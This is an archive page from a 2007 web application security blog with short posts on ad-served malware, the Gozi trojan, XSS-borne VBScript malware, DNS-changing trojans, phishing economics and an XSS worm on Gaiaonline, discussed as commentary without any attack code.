Cenzic 232 Patent
Paid Advertising
web application security lab

Archive for the 'Anti-Virus' Category

80% of Malware Served By Ads

Tuesday, March 27th, 2007

There’s an interesting article about some research that Finjan did regarding their findings that 80% of Malware is served by ads. Taking aside the statistic itself, which you can either agree with or not (maybe it’s 80% that Finjan detected), it’s still an interesting trend. However, one thing struck me in the article that they almost glossed over. They mentioned that one trend is that they are embedding the code so that it executes when seen through translation services. Interesting.

There’s a few reasons this is interesting. Firstly, it’s kind of a slap in the face to people who think that using translation services somehow makes you safer or more private (I’ve never understood why people think that since it still downloads all the embedded content directly from your server), and secondly it really opens up a new way to target your attack. It’s easy to tell when a user is using a translation service (referring URL and/or lack of referring URL but preceded by a pull from a translation service - this could be aided by unique IDs on images to track them back to specific pages).

Now using the translation service to know that your target is located in some area that speaks whatever language they are using, you can be sure that they are in an area that has no extradition treaties with wherever you are hosting. That can greatly reduce the liklihood of getting caught, while still maintaining some good number of malware infections. Kinda nasty. I might be reading a little too far into Finjan’s findings, but still, it’s interesting to think about.

Good Writeup On the GOZI Trojan

Friday, March 23rd, 2007

digi7al64 and Rahul both alerted me to a really good writeup on the Gozi trojan written by Don Jackson. Not only is is a good writeup but it’s extremely thorough on all the details from the transmission to how the code operates, to what it does once installed, etc… etc… Very good writeup indeed. The major scary part about this trojan is that it is specifically designed to steal information that would otherwise be invisible to an attacker due to SSL.

I think my only beef with the writeup (and this is a nit pick, really) is that the example output is from Wireshark instead of a HTTP proxy, so it’s difficult to read what’s going on, and parts of the header are cut off. Wireshark is a great program, it’s just really not ideal for looking at HTTP traffic in an intelligible way (although that could be a nice feature enhancement to it - or even turning it into a HTTP MITM itself). Again, that’s a nit-pick, because this is a great writeup.

Windows Live Italy Being Used Maliciously

Tuesday, March 20th, 2007

Zach sent me a link to a hackin the box article about how Windows Live is being used by blackhat SEO (search engine optimization) to bring malware links to the top of the search results. This marriage between blackhat SEO and hacking is starting to take off. It’s unclear what tactic they used to get to the top of the search results, but clearly, it worked, as they ended up taking over quite a bit of Live’s Italian site.

Once the users were on the Live.com site apparently they were served up links to malware sites. The search engine itself was used as a conduit for sending people to the malicious search pages. This is yet another reason why search engines shouldn’t index XSS. Even if the site is benign, they would be indexing links to malicious pages on benign sites. Anyway, interesting read, and it’s scary that the SEO community is now dabbling in hacking as well. It was only a matter of time.

JavaScript XSS is Conduit For Viruses (but so is VBScript)

Thursday, March 15th, 2007

I know this sort of attack has been around for a while, but perhaps not quite in this way and not quite as many servers were affected, but there is a report over at SANS talking about an XSS VBScript malware that injects malware. Ben Heinkel alerted me to it and actually put up two screenshots here and here showing how the code actually worked. Pretty nasty stuff, especially as it appears there is no virus definition for this particular variant yet.

However, there are two things about this that are more interesting from an attack perspective. The first is that this was not calling malware that was uploaded to the site that had been compromised. Why bother? Since the sites themselves had XSS holes on them (I’m assuming persistent) the only requirement was that the executable and VBScript was housed somewhere on the Internet. No longer do you have to upload your malware to the machine you want to infect people from. Who needs all that hassle when all you really want to do is link to it?

The second thing that’s interesting is that this uses VBScript. Firefox users might be cheering since they wouldn’t be vulnerable to this without a plugin, but really it’s a pretty interesting thing that it is easier to write Malware that installs executables in VBScript than JavaScript. Although JavaScript is still the favorite for port scanning and controlling the page it was VBScript used in the attack. I think people tend to forget about VBScript, but it’s potentially just as nasty considering the wide userbase that supports it.

U.S. Government Testing Cybersecurity

Friday, February 16th, 2007

I’ve been asking about this for years now, but I finally got my answer, yes, the US government is going to test the state of cyber-security in the event of a cyber war. The goal is to identify weaknesses and come up with solutions to a large scale network attack. I was bitching about this when I was a member of the IT-ISAC - there was no one working on this at the time, and it was scaring the crap out of me. Apparently someone was listening!

I have no idea how the test is going to play out, but to anyone who is involved, let me reiterate this issue - the attacks often come from within. It’s not only outside threats we are going to have to contend with (and furthermore once something is inside a network it’s hard to get out). So is the case with viruses, XSS worms, botnets, etc…. You may be able to kill the command and control but that relies on one critical assumption - that there is one. Anyway, I’ll be very interested to see the results of these tests if they are ever published.

Pharming Worms Are Real

Friday, January 19th, 2007

Am I going to have to eat my words? I was thumbing through some AV reports over the last few days and one report stuck out at me. Granted, I don’t follow each worm (not enough hours in the day for all the things I’d like to explore) but I was surprised to see a worm that had to do with Pharming. For those of you who are unfamiliar with the term, unlike phishing, pharming takes a more proactive approach by forcing people’s DNS entries to point to a different/malicious server. Frankly, I thought it was mostly the stuff of science fiction since no one could point to a single example of any instance of pharming greater than 100 people (a single ISP that got it’s DNS compromised). Granted, the trojan doesn’t mention pharming but that is the obvious next step if it isn’t already doing it (rather than just trying to get some click-through traffic on some websites).

Trojan.Flush.K also known as Trojan.Dnschanger modifies DNS entries on your Windows box and attempts to forward you to a malicious website. The obvious synergies with phishing attacks make this particular one stand out at me. Symantec rated this one very low (probably to do both with the lack of virulence and the ease of cleaning the system), but it’s interesting to note how potentially dangerous this could be if it were more widespread and written with more malice.

The Small Business Primer on Network Security Threats

Wednesday, January 17th, 2007

I know I don’t often talk about network security (that’s really more id’s domain than mine anyway), but I got sent this link this morning that I thought I’d share. It’s the small business primer on network security threats. It’s a pretty good brief overview on what you want to do as a small company to make sure you are secure from the more common security threats out there. It’s a pretty good high level read. There are a few things I’d probably have added if I had written it.

Anti-Spyware: spyware is really really nasty, I don’t care what people say, it’s one of the nastiest things out there today. Not just because it can read what you are doing, but because with minor changes they can force your system to download viruses, keyloggers or whatever else they want. It’s nearly impossible to stop without a good anti-spyware program. People may confuse this with a Trojan, but a trojan is something with an implicit back door. With spyware or adware the administrators can inadvertently land you on a site that will make them a few bucks but the other server in question gives you something malicious. It’s not a Trojan by design, but it can act as one.

Network segregation: id could probably go off on this one bullet alone, but by separating your networks (wireless is separate from corporate, etc…) you hugely reduce the liability of having one machine compromised.

Local admin genie: Don’t let the local admin genie out of the bottle. If you give your users local admin rights, they will do way more with the computer than you would want them to. The second you give them higher privileges to install anything, you have opened yourself up to attack. It makes it hugely inconvenient for your users who want to install their favorite MMORPG on your work computers, but it’ll save you tons of hassles.

SSL/SSH/VPN: Encrypt your traffic, even if someone can ARP spoof a switch, they’ll be reading garbage. Don’t let them see your traffic. This is in response to their WiFi honeypot (I think they meant MITM bridge, but you get the idea).

Turn off all unneeded services: It’s a simple one, but this is one of the most important to corporate security. There’s no reason to keep FTP open, if you have SSH - you can SCP things over SSH, so shut down that exploitable outdated WuFTP service.

Email separation: Keep your work and your personal email separate, that way if they get an email from their bank at their work address they’ll be more likely to know it’s fraud. Further, don’t click on links in emails - ever! That’s what we call, bad. If you really want to cause a revolt ban all access to all freemail services, because really, what are you paying them for?

Backups: If you aren’t backing your data up, something as simple as a misplaced cup of coffee can bring your business to a halt. Network security involves good application security as well, and disaster recovery is a key component of that.

Anyway, I’m sure there are dozens of other simple things you can do, but that stuff definitely will help. Interesting read for the IT novices.

Surfing the Web Can Make You a Sex Offender

Sunday, January 14th, 2007

This is a really upsetting story about how a teenager was infected by a trojan, used as a fileserver for child pornography, and then attempted to be prosecuted as a sex offender. The sex offender charge was based off of a plea charge after admitting to showing other teenaged boys a playboy magazine. The circumstances are so ridiculous it’s just painful to read. The jist is the boy went to visit a porn site that infected his computer, and then the police detected the computer uploading child pornography.

I was asked after being sent this if having a firewall and anti-virus is enough to protect your computer. Unfortunately the answer is no. Let’s think about session riding for a second. It is trivial to get any user to download images from any website that doesn’t protect itself with a simple IMG tag. In this way a user can visit an otherwise benign site, and be forced to download child pornography or perform attacks on servers or whatever the attacker wants by proxy. Very scary.

Google Blacklist Breakdown

Thursday, January 4th, 2007

Michael Sutton has a good writeup on the Google blacklist that he released today. He sort of went over the obvious stats, who’s getting phished the most, where the phishers are hosting, etc… So for the most part it wasn’t that interesting to me personally (but I’ve been in this business for years). However, one thing did make me think. Michael mentioned that the lack of sophistication points towards the lack of need for sophistication.

Like any stats person would do, I had to think about what that really means. Is it that they don’t require sophistication or is it that they can’t achieve it. Who is building the phishing kits that they buy? Are these people the world’s best programmers? Are they going to build something that’s in vogue for a few days (a 0day browser exploit) only to have to re-code it a few days later when the patch roles?

Just like in any business the name of the game is scalability. You have to build a scalable product for as cheaply as possible. Just because x% people have anti-phishing in their browser doesn’t mean you don’t put it up. That’s like saying if you’re McDonalds you don’t want to stay in business because a certain slice of the population cares about early heart disease. Who cares? If it makes you money that’s all that’s important. Sophistication is not a current requirement for their business model. The scary thing is that with technology that is years old they are only now encountering tools that even put a dent in their business model.

That lack of sophistication in our own tools to detect and take down phishing sites is the real issue here. We (browser companies, AV companies, ISPs) have not created enough damage to their business to force them to adopt next generation tactics. So although they may have the arms necessary to fight a nuclear war, they don’t have to, because we’re still fighting with bows and arrows. They haven’t even scratched the surface of technical sophistication in their phishing attacks. And who could blame them? There’s no cost incentive to do so. We haven’t created that incentive yet.

Semi Reflective XSS Worm hits Gaiaonline.com

Thursday, January 4th, 2007

I go to sleep for a few hours and I miss all the fun. Apparently Kyran wrote and turned on an XSS worm against Gaiaonline.com. In just 3-4 hours over 1500 people were infected with the benign virus. I chatted with Kyran about this, and although it used a persistent means to propagate it was really a reflective payload. One could argue it’s completely persistent, but it’s interesting none-the-less.

Here’s the source to Gaiaworm.

Clearly these types of worms are becoming more commonplace as the propagation methods become more widely understood. Unfortunately most of these worms happen to look a lot like AJAX, so it’s difficult to write signatures for them. I’m surprised the anti-virus/anti-malware community hasn’t tried to solve this one yet. This is really their domain of expertise - genetic propagation.